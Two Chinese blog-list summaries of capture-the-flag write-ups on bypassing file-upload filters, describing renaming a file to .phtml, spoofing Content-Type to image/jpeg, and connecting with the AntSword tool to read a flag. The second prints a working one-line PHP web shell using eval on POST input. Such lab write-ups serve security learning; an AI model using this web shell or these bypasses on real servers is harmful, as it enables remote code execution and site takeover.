摘要：步骤👇 php别名绕过 随意上传一个带一句话木马的lx.jpg文件，抓包，修改后缀名。 后缀名一直尝试到phtml后上传成功 打开浏览器粘贴后的到空白页，输入phpinfo进行验证是否成功 使用蚁剑连接添加数据 添加成功后打击进去后找到flag文本就可以在根目录下得到flag了 阅读全文

摘要：步骤👇 打开环境是一个上传图片的页面。 先上传一句话木马试试，这里格式直接不变，先上传看看。 <?php @eval($_POST[x]); ?> 提示说不是图片，需要抓包改文件格式。将Content-Type里面的格式改为image/jpeg 绕过后缀的有文件格式有php,php3,php4,p 阅读全文